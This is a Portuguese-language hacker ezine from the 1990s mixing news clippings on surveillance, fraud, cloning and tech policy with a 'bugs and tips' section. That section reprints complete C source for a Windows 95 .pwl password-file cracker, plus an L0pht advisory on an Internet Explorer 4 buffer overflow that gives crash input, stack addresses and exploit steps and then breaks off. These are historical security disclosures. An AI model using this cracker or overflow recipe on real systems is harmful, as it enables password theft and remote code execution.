por dentro que uma pessoa pode fazer voce entrar numa situacao "irrecusavel". E numa dessas se cai numa armadilha. Uma vez li numa revista que um sujeito, falando de outro, comentou uma festa bem doida para o qual tinha sido convidado. O cara era um idolo da juventude (era, veio a Aids, e como a Legislacao proibe difamar os mortos..). Chegou uma hora em que o lance da festa era o seguinte: todo mundo ali tinha que assumir que no fundo do fundo do fundor era bissexual. "Quem nao admitisse era por que tinha alguma frescura e fresco tinha mais e que nunca mais vir numa festa dele". Detalhe: a maioria do pessoal constava no RG como sendo do sexo masculino. Nao sei se isso foi invencao de um cara sobre outra figura que acabou virando simbolo de luta contra a Aids, etc, etc.. mas e de se pensar ate que ponto uma pessoa e fa de outra. Perigoso. Vou terminar contando uma historia sobre um cara chamado Mordechai Vanunu. Um sujeito comum, israelense. Pegou um estagio numa fabrica da terrinha dele, sem saber o que era direito. Descobriu que a dita cuja produzia equipamentos muito especificos. Bombas nucleares. Coisa completamente ignorada pelo mundo, na epoca. Totalmente secreto. E .. era um sujeito idealista, embora tivesse altos problemas com a familia. Juntou entao um problema familiar com um problema de consciencia. Por via das duvidas, decidiu fotografar o local. E continuou trabalhando la. Ate que um dia, pra desanuviar a cabeca, saiu pelo mundo. Sem resolver os probleminhas de cuca. E acabou encontrando uma alma gemea, um cara que tinha feito a mesma linha de estudo que ele. Nietzche, Kierkegaard, essas coisas. Igreja Anglicana. Dificil acreditar, mas se converteu e passou a frequentar direto. Numa noite qualquer, o bate papo la da congregacao era desarmamento nuclear, o novo convertido abriu a boca pra aliviar seu grande segredo. Na Australia, o sujeito estava. Em pouco tempo um jornal da Inglaterra, o London Sunday Times mandou um reporter pra entrevistar. Vamos contar para o mundo que Israel tem a bomba! Legal, o cara foi levado para o Reino Unido. Ia ser uma bomba, a noticia, em todos os sentidos. Alias foi. So que o servico secreto israelense, o MOSSAD ficou sabendo.O pessoal la ficou meio p(*) da vida. Parece que os EUA ja sabiam da fabrica de bombas, mas fingiam nao saber. De qualquer forma, o que era uma especie de boato, teve algum tipo de confirmacao, ja que o cara tinha fotos da coisa toda. Legal, ne? O jornal adiou um pouco a publicacao, sabe-se la porque. O novo convertido ficou mofando, mofando la naquela cidade que se chama Londres, provavelmente sentindo que nem o Caetano, procurando disco voador no ceu (na falta do que fazer no Hyde Park). Ai pinta aquela gostosa do lado dele. Conversa vai, conversa vem.. o cara resolve descarregar suas confiss⌡es e frustrac⌡es, ela e boa ouvinte, escuta tudo. E ficam amigos, os dois. Namoram. Ela convida ele para uma sei-la-oque de mel na Italia. Ele vai. Hoje o Mordechai resolveu seus problemas de habitacao, por assim dizer. Vive extremamente seguro. Prisao de seguranca maxima. O MOSSAD tinha contratado a menina para fazer ele sair da Inglaterra. Na Italia, foi sequestrado e levado para Israel onde foi julgado por alta traicao. 18 anos numa solitaria, de vez em quando um ou outro irmao o visita. Existe um movimento no exterior clamando pela sua libertacao. Ouvi falar. Mas fica a historia: "Quem conta seus segredos, perde a liberdade." NEWS - DICAS - BOATOS - HUMOR - NOVOS BUGS - CARTAS - SEI L┴ .. RECEITA TESTA SISTEMA CONTRA SONEGA╟├O Objetivo e cruzar informac⌡es cadastrais de empresas com declarac⌡es de IR de pessoa juridica BRAS═LIA - A Secretaria da Receita Federal esta montando um sistema integrado para reduzir, ainda mais, as possibilidades de sonegacao de impostos federais por parte das empresas. Um projeto piloto ja esta em execucao no Rio, com o objetivo especifico de cruzar as informac⌡es de cadastro das empresas com as declarac⌡es de Imposto de Rednda da Pessoa Juridica (IRPJ) e co os dados que fornecem por meio de outro documento, denominado Declaracao de Contribuic⌡es e Tributos Federais (DCTF). Nesse documento a Pessoa Juridica informa tudo o que pagou de imposto e relaciona eventuais creditos tributarios que tem a receber. Trata-se de uma inovacao da Receita para eliminar as brechas que ainda permitem aos proprietarios de empresas sonegar imposto como Pessoa Juridica ou ate na condicao de Pessoa Fisica, quando apresentam suas declarac⌡es individuais. Montar interligacao dos sistemas foi tarefa facil, pois a Receita opera com 400 programas. Hoje, esses programas nao se comunicam e, para verificar ou cruzar informac⌡es, e preciso uma analise especifica pelo Serpro. A Receita espera que ate o fim de 1998 todos os programas estejam interligados.[...] (Estado de Sao Paulo, 15/08/97 - Beatriz Abreu e Lu Aiko Otta - secao de Economia) Espi⌡es Vermelhos Como a policia secreta de [..] espionava a oposicao, sindicatos e ate o PT. [..] O governador [..] tambem gosta de se alimentar de informac⌡es produzidas na velha arapongagem policial. VEJA teve acesso a 123 relatorios feitos por uma equipe de quarenta policiais militares que formam o braco secreto da PM de Brasilia, a PM-2. Nos documentos, constata-se que a policia secreta do governador se encarrega de espionar reuni⌡es de sindicatos petistas e ate encontros de cupula do proprio PT. Como e regra nesse servico, o trabalho dos agentes que se infiltravam em reuni⌡es partidarias era condensado na forma de relatorios. Uma copia deles ia para o Centro de Informac⌡es do Exercito, o CIE. Outra era enviada para a Agencia Brasileira de Inteligencia, Abin, que sucedeu ao SNI. Uma terceira era despachada para o gabinete militar do governador. Lendo-se os relatorios, constata-se que os agentes secretos invadiam propriedade privada e operavam fora das divisas do Distrito Federal. Um dos relatorios, de abril do ano passado, mostra que agentes chegaram a bisbilhotar uma fazenda do deputado distrital e empresario Luiz Estevao, o amigo de Collor e lider da oposicao ao governador. [..] A PM-2 formou uma estrutura com 140 pessoas, divididas entre as que saem α rua para trabalhar e aquelas que ficam no escritorio batendo papo, o chamado "apoio". Nao usavam farda nem iam ao quartel. Nao andavam em viaturas, usavam nomes falsos e agiam como personagens de um filme B de espionagem. Tambem usavam equipamento de filmagem, gravacao e armamento. Dentro do Palacio do Buriti ha uma sala de cerca de 30 metros quadrados onde fica um computador que armazena parte dos relatorios. A sala, chamada oficialmente de Secao de Apoio Tecnico da Casa Militar, fica a menos de cinquenta passos do gabinete do governador. O pedaco mais curioso, batizado de subsecao de operac⌡es, fica num pequeno predio, quase oculto, na Esplanada dos Ministerios, proximo ao Ministerio da Fazenda. E' um lugar cercado de mato alto, onde se revezam trinta agentes. E' nesse bunker que os arapongas faziam seus relatorios. [..] Em todos os Estados, a PM tem um braco secreto e nao e incomum que extrapole suas func⌡es, entrando no terreno da espionagem e pura bisbilhotice. [..] Quando um governador toma posse nao precisa mandar a Secretaria da Fazenda recolher tributos. Isso e uma tarefa automatica. No caso do braco secreto da PM acontece o mesmo. A bisbilhotagem segue em que alguem de uma ordem. O governador pode proibir a atividade, estimula-la ou deixar tudo como esta, como quem nao sabe de nada.[...] (VEJA - 25/09/96 - pags 38,39,40 - Policarpo Jr., Brasilia) OLHAR ELETR╘NICO QUE VIGIA SP Cameras do CET registram tudo o que se passa em 86 cruzamentos e quatro tuneis da cidade. Sentir-se observado, procurar por toda parte e nao encontrar ninguem pode nao ser mania de perseguicao. Voce esta mesmo sob olhares atentos, apesar de nem desconfiar disso. Mas o poderoso instrumento da "espionagem", que nao perde um detalhe em seu campo de visao de 360 graus e da zooms inacreditaveis e simples de ser localizado. Basta voltar a cabeca para cima num dos 86 cruzamento ou 4 tuneis. La estao as cameras da Companhia de Engenharia de Trafego (CET). Nesse momento, tecnicos de controle de trafego (TCT) podem estar captando o movimento on line num dos monitores das centrais espalhadas por Sao Paulo. Pelas telas das salas sempre na penumbra, esses profissionais tem uma pequena amostra de tudo o que acontece nas ruas da cidade. Imagens sem sons, mas impressionantes. Vao do acidente digno de filme de acao a relac⌡es sexuais praticadas por casais dentro de carros parados nos tuneis. Flagrar cenas tao constrangedoras como motoristas da terceira idade estapeando-se apos uma batida, e quase um "acidente". [..] "O objetivo e a informacao visual do trafego, faze-lo fluir", diz o coordenador do Projeto Semaforos Inteligentes da CET, Edgar Linguitte.[..] Assim que qualquer ocorrencia e registrada pela camera, os tecnicos p⌡em o video para funcionar. "Da gravacao, podemos tirar estrategias para corrigir os problemas", diz Pulz. [..] Quando aciona o zoom de alguma camera para socorrer alguem, por um momento o TCT Marcio Donizete tem a sensacao de estar invadindo a privacidade das pessoas. "A gente vai no rosto do motorista, ve seus tracos", admite Lima, que trabalha na Central da Bela Cintra, "Se ha um acidente com duas pessoas, e como se voce fosse a terceira, tamanha a realidade das imagens".[..] Os casais paulistanos, por sua vez, tem escolhido os tuneis para namorar. Dentro dos carros, parados nas baias planejadas para emergencias, sentem-se protegidos dos curioso e mantem relac⌡es sexuais sem o menor constrangimento.[..] Talvez a situacao so seja complicada para o marronzinho que precisa ir ao local e convidar os animados namorados a retomar a viagem.[..] A urbanista Arlete Moyses Rodrigues, livre-docente da Universidade Estadual de Campinas (Unicamp) considera o sistema uma invasao da privacidade. "Esse tipo de fiscalizacao nao acrescenta nada, o que deveria haver era investimento em educacao". (Jornal O Estado de Sao Paulo, 24/08/97, pags C1 - C4 - Marisa Folgato) --------------------------------------------------------------------------- E D U P A G E 26 de agosto de 1997 | Portugues ________________________________________________________________________ FRAUDES ON-LINE ENVOLVENDO CARTAO DE CREDITO Devido ao grande numero de assinantes que inclui muitos iniciantes nas atividades on-line, a AOL (America Online) vem sendo um alvo facil para criminosos que tentam cometer fraude; os assinantes da AOL vem recebendo mensagens que objetivam descobrir numeros de cartao de credito. Em recente mensagem intitulada "Informacoes Importantes da AOL" e falsamente identificada como vinda do Departamento de Assinaturas da AOL, os destinatarios das mensagens foram convidados a entrar na pagina da AOL na Web e fornecer seus nomes e numero de cartao de credito. Washington Post 26 ago 97 ________________________________________________________________________ JUIZA DECIDE QUE CONTROLES DE EXPORTACAO DE CRIPTOGRAFIA VIOLAM LIBERDADE DE EXPRESSAO Uma juiza de um Tribunal Distrital dos EUA decidiu que as restricoes, recentemente revisadas pelo Governo Clinton, sobre exportacao de software de criptografia, sao inconstitucionais. Em dezembro, ela determinou que uma versao submetida era inconstitucional. A decisao da juiza foi baseada em sua crenca de que codigos de computadores sao formas de expressao, "como musica e equacoes matematicas", e restringi-las constitui uma violacao da liberdade de expressao. Alem disso, a nova regulamentacao, assim com as antigas, nao estabelece prazos ou padroes para as decisoes sobre licencas concedidas pelo governo e nao preve a revisao judicial. A decisao "tera' um forte impacto na lideranca dos EUA na industria de software e do comercio eletronico", comentou um representante da Electronic Frontier Foundation", e um impacto enorme na questao do direito 'a privacidade nos proximos 100 anos". AP 26 ago 97 ______________________________________________________________________ CRACKER SE DECLARA CULPADO POR ROUBO DE INFORMACOES DE CARTAO DE CREDITO Um cracker de computador, acusado de roubar mais de 100.000 numeros de cartao de credito de empresas que vendem produtos pela Internet, declarou-se culpado antes da data do julgamento e podera' pegar 30 anos de prisao e multas de ate' US$ 1 milhao. A sentenca esta' prevista para ser proferida em 25 de novembro desse ano. AP 26 ago 97 ________________________________________________________________________ 17 de agosto de 1997 | Portugues ________________________________________________________________________ PROBLEMAS DE SEGURANCA Dois dias apos a Experian Inc. (bureau de credito conhecido no passado como TRW Information Systems & Services) ter comecado a permitir que os clientes utilizassem a Internet para consultar seus relatorios pessoais de credito, a empresa repentinamente interrompeu a prestacao do servico apos ter tomado conhecimento de que quatro pessoas obtiveram informacoes financeiras sobre terceiros. A professora de computacao da Universidade de Georgetown, Dorothy Denning, declarou que a experiencia da Experian "mostra como e' dificil a seguranca on-line no caso de prestacao de servicos de acesso a informacoes". Washington Post 16 ago 97 ________________________________________________________________________ INDIVIDUO DELATADO POR PROVEDORA DE ACESSO E' PRESO POR PORNOGRAFIA Uma provedora de servico Internet nao identificada, que auditava a conta de um individuo do Colorado "por razoes de negocios", alertou a policia de que tal individuo havia baixado mais de 70 fotos coloridas de adultos praticando sexo com criancas. Estar em posse de material sobre pornografia infantil e' ma' conduta, e produzir e distribuir tal material e' crime; o individuo foi preso. Dave Banisar, do Centro de Informacoes Eletronicas de Privacidade levantou a questao da privacidade. "As provedoras de servico nao devem fazer esse tipo de coisa. Elas sao como as companhias telefonicas, que nao tem acesso 'as conversas telefonicas. AP 16 ago 97 ________________________________________________________________________ HORA DE SE DESCONECTAR! AGORA! ENQUANTO E' TEMPO! SERIO MESMO! A psicologa da Universidade de Pittsburgh, Kimberly S. Young, acha que as "salas de bate-papo" do ciberespaco e os jogos de fantasia constituem as principais atracoes para as pessoas propensas a se "viciarem" na Internet. "Como nos bares de encontros, onde todos acabam conhecendo seus nomes". Young comentou que vem sendo contatada por advogados a respeito de divorcios causados pelo vicio de um dos conjuges na Rede. AP 15 ago 97 E D U P A G E 2 de outubro de 1997 | Portugues ________________________________________________________________________ "GERENTE DE CONHECIMENTOS": O MAIS NOVO ALIADO DA TECNOLOGIA O novo cargo que esta' crescendo nos circulos da tecnologia da informacao e' o de "Gerente de Conhecimentos". A descricao do cargo se concentra em trazer negocios em potencial e conhecimentos tecnicos para melhorar a posicao da empresa na concorrencia e envolve nao apenas localizar como tambem organizar, manipular, filtrar e apresentar informacoes de forma que os empregados na linha de frente possam compreende-las e utiliza-las. Hal Varian, decano da Faculdade de Administracao de Informacao e Sistemas da Universidade de Berkeley, na California, comentou que existe uma grande quantidade de informacoes com que conta uma empresa e e' necessario estruturar tais recursos para que sejam uteis". Fornecer essa estrutura e trabalhar com o lado tecnico da empresa para tornar os recursos de informacao disponiveis e uteis aos empregados sera', cada vez mais, um elemento chave para a maioria das empresas nos proximos anos. Information Week 29 set 97 ________________________________________________________________________ SINDROME DA FADIGA POR EXCESSO DE INFORMACAO - PERIGOSO PARA A SAUDE O fenomeno de contrair enfermidades como resultado do estresse causado por uma sobrecarga de informacoes tem agora um nome oficial - Sindrome da fadiga por excesso de informacao - e, de acordo com um relatorio do Reuters Business Information de 1996, quase metade dos gerentes de primeira linha e um terco de todos os gerentes sofrem dessa sindrome. Investor's Business Daily 1 out 97 E D U P A G E 9 de novembro de 1997 | Portugues O ESTADO DO TEXAS DOS EUA PROCESSA MICROSOFT O estado do Texas - onde fica a matriz da Compaq e da Dell, duas das maiores fabricantes de computadores do mundo, esta' processando a Microsoft por interferir na investigacao do estado de possivel infracao da lei anti-monopolista da Microsoft, e os representantes do estado estao furiosos com a Microsoft por esta nao liberar os fabricantes das clausulas de "sigilo" contidas nos contratos de licenca. O procurador do geral do estado comentou: "O dominio exagerado de mercado exercido pela Microsoft intimida os fabricantes de computadores, cuja sobrevivencia depende essencialmente do acesso ao software de sistema operacional da Microsoft, que roda em 90% de todos os computadores pessoais vendidos hoje em dia. Os fabricantes estao com medo de passar informacoes porque nao ha' como eles as passarem confidencialmente". A Microsoft responde: "Permanecemos dispostos a discutir quaisquer conciliacoes que acomodem adequadamente os interesses da Microsoft em relacao 'a divulgacao de informacoes potenciais de sua propriedade... O codigo e os termos sob os quais se licencia esse codigo a outros constituem ativos criticos de qualquer empresa que esteja no ramo de software. Assim sendo, e' muito importante que se assegure a protecao adequada a esses ativos". New York Times 8 nov 97 ________________________________________________________________________ E D U P A G E 9 de novembro de 1997 | Portugues O ESTADO DO TEXAS DOS EUA PROCESSA MICROSOFT O estado do Texas - onde fica a matriz da Compaq e da Dell, duas das maiores fabricantes de computadores do mundo, esta' processando a Microsoft por interferir na investigacao do estado de possivel infracao da lei anti-monopolista da Microsoft, e os representantes do estado estao furiosos com a Microsoft por esta nao liberar os fabricantes das clausulas de "sigilo" contidas nos contratos de licenca. O procurador do geral do estado comentou: "O dominio exagerado de mercado exercido pela Microsoft intimida os fabricantes de computadores, cuja sobrevivencia depende essencialmente do acesso ao software de sistema operacional da Microsoft, que roda em 90% de todos os computadores pessoais vendidos hoje em dia. Os fabricantes estao com medo de passar informacoes porque nao ha' como eles as passarem confidencialmente". A Microsoft responde: "Permanecemos dispostos a discutir quaisquer conciliacoes que acomodem adequadamente os interesses da Microsoft em relacao 'a divulgacao de informacoes potenciais de sua propriedade... O codigo e os termos sob os quais se licencia esse codigo a outros constituem ativos criticos de qualquer empresa que esteja no ramo de software. Assim sendo, e' muito importante que se assegure a protecao adequada a esses ativos". New York Times 8 nov 97 ________________________________________________________________________ E D U P A G E 6 de novembro de 1997 | Portugues ________________________________________________________________________ LEGISLACAO PARA ROUBO CIBERNETICO COLOCARIA ATE' ROBIN HOOD NA CADEIA De acordo com um projeto de lei introduzido pela Camara de Deputados dos EUA pelo congressista Bob Goodlatte (republicado pelo estado da Virginia), qualquer pessoa que utilize a Rede para se apropriar indevidamente de trabalhos patenteados estara' cometendo uma infracao federal, seja qual for o objetivo do ato - lucro pessoal ou nao. A inspiracao para essa legislacao veio de um julgamento de um caso em Massachusetts em que um estudante deixou 'a disposicao do publico, em um boletim eletronico, um software comercial. AP 6 nov 97 ________________________________________________________________________ MCNEALY CONTRA GATES O executivo da Sun, Scott McNealy, fez um apelo aos apoiadores da linguagem Java para que enviassem uma "enxurrada" de mensagens eletronicas para Bill Gates registrando que "queremos 100% Java". Ele comentou: "A Microsoft nao e' mais distribuidora de plataformas Java. As pessoas estao confusas, com a impressao que existem duas versoes da Java. Isso nao e' verdade, so' existe uma: Java pura ... Ao se pingar tres gotas de veneno em uma aplicacao 100% Java, obtem-se ... Windows. Ao se pingar tres gotas de Java em Windows, ainda obtem-se Windows." Tod Nielsen, executivo da Microsoft, respondeu 'as acusacoes de McNealy assim: "A diretoria da Sun deveria lavar a boca com sabao. Se minha filha de cinco anos falasse dessa forma ela estaria soltando bolhas de sabao pela boca". New York Times Cybertimes 6 nov 97 ________________________________________________________________________ O CASAL DA INTERNET Sao Paulo, segunda, 20 de outubro de 1997. ----------------------- NAMORO VIRTUAL Eles estavam em um hotel Casal da Internet e achado vivo no PI e do NP Policiais de Teresina (PI) prenderam anteontem, αs 7h, o goiano Oliveira e Silva, que ha 12 dias havia sumido com a artista Carla Patricia Coelho, que mora em Campo Grande (MS). [..] Silva e Carla foram encontrados na ???????? ??????? Hotel, na BR-316. Ele foi preso em flagrante e autuado por de automovel. "Ele furtou um carro em Fortaleza para fugir a artista plastica", disse o delegado. [..] "Cai num abismo. Nao sei se conseguirei acreditar nas pessoas",afirmou Carla. ------------------------ Sao Paulo, terca, 21 de outubro de 1997. Plano de internautas era se casar ntem (PAULO MOTA da Agencia Folha, em Fortaleza RUBENS VALENTE da Agencia Folha, em Campo Grande) O desempregado Flavio de Oliveira e Silva, 36, e a artista plastica Carla Patricia Coelho, 29, que se conheceram pela Internet e passaram 13 dias desaparecidos, tinham planejado se casar ontem, numa "grande festa α moda cigana", em Campo Grande(MS). "Ele (Silva) disse que iria aproveitar o aniversario dele hoje (ontem) e fazer uma festa so", afirmou Carla. Os dois foram encontrados pela policia anteontem num hotel, em Teresina (PI). Eles estavam sem dar noticias a parentes desde 8 de outubro, quando sairam de um hotel luxuoso em Fortaleza (CE) sem pagar a conta de R$ 1.700. Silva foi preso em flagrante, acusado de estelionato e nao quis falar com a Agencia Folha. A policia acredita que Carla foi enganada por Silva e considerou-a inocente. [..] O casal se encontrou em 2 de outubro, em Goiania, e embarcou para Fortaleza, para uma "viagem de lua-de-mel". A hospedagem foi numa suite com vista para o mar e diaria de R$ 273. Usando um carro alugado em Fortaleza, o casal acumulou divida de R$ 4.800 em despesas e hospedagens em hoteis de praias como Jericoacoara (CE), Parnaiba (PI) e Sao Luiz (MA). As contas foram pagas com cheques e cart⌡es de Carla, que confiava num deposito de R$ 10 mil que Silva havia feito em sua conta. O cheque depositado era roubado de outra conta da propria Carla. Ela diz que so descobriu que Silva estava mentindo quando a policia os abordou em Teresina. FOLHA DE Sao Paulo, domingo, 13 de julho de 1997. EMPREGADO LADR├O perfil do funcionario desonesto aplica mais golpes no trabalho PIVETTA Reportagem Local Pesquisa feita pelo especialista em fraudes e crimes financeiros Marcelo Alcides Gomes, 33, tracou o perfil do empregado que rouba ou da golpes na empresa em que trabalha. De acordo com dados preliminares da pesquisa, o golpista tipico e o homem casado, com idade entre 31 e 40 anos, que ocupa um cargo abaixo do nivel de gerencia e terminou apenas o segundo grau. As mulheres aparecem na pesquisa como sendo autoras de apenas 16,7% dos delitos cometidos nas empresas. Primeiro brasileiro a ser aceito como membro da Association of Certified Fraud Examiners (associacao de investigadores de fraudes em empresas) -que reune 13 mil associados e e sediada nos EUA-, Gomes enviou questionarios a 1.500 empresas brasileiras (inclusive as 500 maiores) e recebeu, ate agora, resposta de 735 companhias. A pesquisa constatou algum tipo de golpe ou desfalque cometido por funcionarios em 717 (97,5%) das 735 empresas. "Apesar de a maioria dos crimes serem cometidos por empregados com nivel inferior ao de gerente e sem curso superior, os maiores desfalques, em termos financeiros, tendem a ser feitos por profissionais com cargo de gerencia ou diretoria e curso superior completo", afirmou Gomes. --------------------------------------------------------------------------- revista VEJA 08-10-97 Daniel Nunes Goncalves A estudante paulista Alessandra Massis comprou um telefone celular ha sete meses. Ela utiliza o aparelho com comedimento e raramente faz ligac⌡es interurbanas. Chamada internacional, nem pensar. Sua conta e a traducao de seus habitos: 60 reais, no maximo. A fatura de marco, portanto, so podia deixa-la de cabelo em pe: 13.571 reais. "Quase morri de susto", diz a estudante. A conta acusava 1.032 ligac⌡es para 36 paises, do Kuwait α Colombia, passando pela Suica e Afeganistao. Alessandra procurou a empresa telefonica do Estado de Sao Paulo, Telesp, e convenceu os funcionarios a dispensa-la do pagamento.[..] . A cada trinta minutos, a companhia recebe a visita de um dono de celular apavorado com contas astronomicas, fruto de ligac⌡es que dizem nao ter feito, todos vitimas de uma fraude que so faz crescer clonagem. Os clones sao telefones nao registrados, programados para debitar suas chamadas na conta de pessoas desavisadas, como Alessandra. [..] Desde o inicio do ano foram registrados milhares de casos de clonagem. Fala-se num prejuizo estimado em 60 milh⌡es de reais para as teles, que poupam os clientes do pagamento mas tem de pagar α Embratel e αs telefonicas internacionais pelas chamadas efetuadas. [..] Para programar um celular frio para debitar suas chamadas na conta de um celular quente e preciso ser tecnico em eletronica e comprar um equipamento de radio portatil chamado scanner, que custa 400 reais e registra a freqⁿencia em que operam os celulares α sua volta. [..] Para dar alguma seguranca ao usuario, a Embratel contratou uma firma americana, a Digital, que vai instalar um sistema antifraude orcado em 14 milh⌡es de reais. O sistema, empregado na Franca e na Italia, compara cada nova ligacao feita com o historico de chamadas da pessoa. "Se alguem so faz ligac⌡es nacionais e surge uma chamada internacional de uma hora, o computador dispara um alarme. Ai, entramos em contato com o usuario para checar a autoria do telefonema", informa Jose Carlos Gabarra, da Digital. O novo sistema deve estar operando ate marco do ano que vem --------------------------------------------------------------------------- BUGS e DICAS ------- start of forwarded message (RFC 934 encapsulation) ------- From: Frank Andrew Stevenson <frank@funcom.no> To: cypherpunks@toad.com Subject: Cracked: WINDOWS.PWL Date: Mon, 4 Dec 1995 17:51:36 +0100 (MET) A few days ago Peter Gutmann posted a description on how Windows 95 produces RC4 keys of 32 bits size to protect the .pwl files. I verified the information and wrote a program to decrypt .pwl files with a known password, I then discovered that the .pwl files where well suited for a known plaintext attack as the 20 first bytes are completely predictable. The 20 first bytes of any .pwl files contains the username, which is the same as the filename, in capitals, padded with 0x00. From then I wrote a program to bruteforce the .pwl file and optimized it so it would run in less than 24 hours on an SGI. I run a test of the bruter software and recovered an unknown rc4 key in 8 hours, but the decrypted file was still largely uninteligeble, I then proceeded to decrypt the file at all possible starting points, and discovered valuable information (cleartext passwords) offset in the file. This has enormous implications: RC4 is a stream cipher, it generates a long pseudo random stream that it uses to XOR the data byte by byte. This isn't neccecaraly weak encryption if you don't use the same stream twice: however WIN95 does, every resource is XORed with the same pseudo random stream. What's more the 20 first bytes are easy to guess. This is easy to exploit: XOR the 20 bytes starting at position 0x208 with the user name in uppercase, and slide this string through the rest of the file (xoring it with whatever is there) this reveals the 20 first bytes of the different resources. >From there I went on to study the structure of the .pwl file it is something like this (decrypted): USERNAME.........wpwpwpwpwpwpwpwpwpwp rs??????? rs rs rs??????????? rs??????? where wp is i word pointer to the different resources (from start of pwl file) The 2 first bytes of the resource (rs) is its length in bytes (of course XOR with RC4 output) It is the fairly easy to find all the resource pointers by jumping from start of resource to next resource, had it not been for the fact that the size sometimes is incorrect (courtesy of M$) What follows is a short c program that tries to remedy this and reconstruct the pointertable thus generating at least 54 bytes of the RC4 pseudorandom stream, and then proceedes to decrypt as much as possible from the different resources. What does this show? Although RC4 is a fairly strong cipher, it has the same limitations as any XOR streamcipher, and implementing it without sufficient knowledge can have dire consequences. I strongly suggest that the programmers at Microsoft do their homework before trying anything like this again! DISCLAIMER: This is a quick hack, I don't make any claims about usefulness for any purpose, nor do I take responsibility for use nor consequences of use of the software. FUNCOM of Norway is not responsible for any of this, (I speak for myself, and let others speak for themselves) This source is hereby placed in the public domain, please improve if you can. - --- glide.c --- #include <stdio.h> #include <string.h> unsigned char Data[100001]; unsigned char keystream[1001]; int Rpoint[300]; main (int argc,char *argv[]) { FILE *fd; int i,j,k; int size; char ch; char *name; int cracked; int sizemask; int maxr; int rsz; int pos; int Rall[300]; /* resource allocation table */ if (argc<2) { printf("usage: glide filename (username)"); exit(1); } /* read PWL file */ fd=fopen(argv[1],"rb"); if(fd==NULL) { printf("can't open file %s",argv[2]); exit(1); } size=0; while(!feof(fd)) { Data[size++]=fgetc(fd); } size--; fclose(fd); /* find username */ name=argv[1]; if(argc>2) name=argv[2]; printf("Username: %s\n",name); /* copy encrypted text into keystream */ cracked=size-0x0208; if(cracked<0) cracked=0; if(cracked>1000) cracked=1000; memcpy(keystream,Data+0x208,cracked ); /* generate 20 bytes of keystream */ for(i=0;i<20;i++) { ch=toupper(name[i]); if(ch==0) break; if(ch=='.') break; keystream[i]^=ch; }; cracked=20; /* find allocated resources */ sizemask=keystream[0]+(keystream[1]<<8); printf("Sizemask: %04X\n",sizemask); for(i=0;i<256;i++) Rall[i]=0; maxr=0; for(i=0x108;i<0x208;i++) { if(Data[i]!=0xff) { Rall[Data[i]]++; if (Data[i]>maxr) maxr=Data[i]; } } maxr=(((maxr/16)+1)*16); /* resource pointer table size appears to be divisible by 16 */ /* search after resources */ Rpoint[0]=0x0208+2*maxr+20+2; /* first resource */ for(i=0;i<maxr;i++) { /* find size of current resource */ pos=Rpoint[i]; rsz=Data[pos]+(Data[pos+1]<<8); rsz^=sizemask; printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i,Rall[i]); if( (Rall[i]==0) && (rsz!=0) ) { printf("unused resource has nonzero size !!!\n"); exit(0); } pos+=rsz; /* Resources have a tendency to have the wrong size for some reason */ /* check for correct size */ if(i<maxr-1) { while(Data[pos+3]!=keystream[1]) { printf(":(%02x)",Data[pos+3]); pos+=2; /* very rude may fail */ } } pos+=2; /* include pointer in size */ Rpoint[i+1]=pos; } Rpoint[maxr]=size; /* insert Table data into keystream */ for(i=0;i <= maxr;i++) { keystream[20+2*i]^=Rpoint[i] & 0x00ff; keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff; } cracked+=maxr*2+2; printf("%d bytes of keystream recovered\n",cracked); /* decrypt resources */ for(i=0;i < maxr;i++) { rsz=Rpoint[i+1]-Rpoint[i]; if (rsz>cracked) rsz=cracked; printf("Resource[%d] (%d)\n",i,rsz); for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]); printf("\n"); } exit(0); } - --- end --- #include <std/disclaimer.h> E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key * * * * * * * * * * * * * * * * * * * * _______________________________________________________________ Document: L0pht Security Advisory URL Origin: http://l0pht.com/advisories.html Release Date: November 1st, 1997 Application: Microsoft Internet Explorer 4.0 Suite Severity: Viewing remote HTML content can execute arbitrary native code Author: dildog@l0pht.com Operating Sys: Windows 95 ------------------------------------------------------------------------------- ======== Scenario ======== The Microsoft Internet Explorer 4.0 Suite, including all programs supplied with it that read and/or process HTML from either local machines, intranet machines, or remote internet machines are subject to a buffer overflow in the HTML decoding process. The buffer overflow can cause the application to page fault, or in the worst case, execute arbitrary precompiled native code. ======= Example ======= 1. Copy the supplied HTML file(s) into a location that is accessible via the target application. 2. Point to it. Look at it. 3. Click on the link. (or let someone click it for you) 4. Become aware of what happens to your machine. 5. Freak out and beg Microsoft to make the bad man stop. ================= Technical Details ================= The problem here lies in the deciphering of the URL line format itself. The base HTML library that is used by the Internet Explorer 4.0 Suite and the following programs are vulnerable: - Outlook Express (both mail and news) - Windows Explorer - Internet Explorer (different than regular explorer, really) This problem, because it stems from a programming flaw in the HTML decoding system, is unaffected by the Explorer "Security Zones" feature. In other words, if you turn on the highest security level for the zone from where the exploit HTML is being viewed, you are still vulnerable. The critical problem here is a buffer overflow in the parsing of a particular new type of URL protocol. The "res://" type of URL is meant to allow access to a local resource embedded in a local DLL file. This is useful for archiving entire websites into a DLL and is not, in its truest concept, a security flaw. For example, to read something out of the IE4.0 Tour (stored in a DLL) try the following URL: res://ie4tour.dll/page1-6.htm The buffer overflow is on the actual filename specified. To crash your machine go ahead and try res://blahblahblah ... blahblah/ in your Internet Explorer window where the amount of 'blah' equals 265 characters. The function that goes through the filename and validates it is flawed on Windows 95. Without checking the length, the filename is uppercased, concatenated with '.DLL' if it isn't there already, and in the process, copied into a fixed size buffer. ======== Solution ======== Currently, there is no solution available for this flaw. You can't set any Internet Explorer options to avoid it, and you are not protected by any level of zone security. Simply don't surf the web, read email or view net news using Internet Explorer 4.0 until Microsoft puts up a hotfix. ============ Exploit Code ============ Here we go... When constructing the exploit we want to try something useful. Lets's start with appending text of your choice to AUTOEXEC.BAT... (note that running native code lets you do pretty much anything you want) Note that the location of the exploit string in the stack is very important and it varies from target application to target application. Constructing the exploit string: Figure out stack location for exploit code... App Loc Internet Explorer 0x0057C144 Windows Explorer 0x0088A0F4 ... Yeah, I know that those locations have null bytes in them and you can't put those (or lowercase letters, or CR/LF or 0x07 or anything like that) in the exploit string... but we'll let microsoft fix that for us. Step thru the process to see IE add that extra null character for you. Will they ever cease to amaze... Put together what you wanna do, tack on the necessary jump addresses and all that. That's it. And now, UUENCODED to preserve freshness: ************************************************************************* * MAKE SURE YOU RUN THIS EXPLOIT WITH __INTERNET__ EXPLORER, _NOT_ * * REGULAR OL' 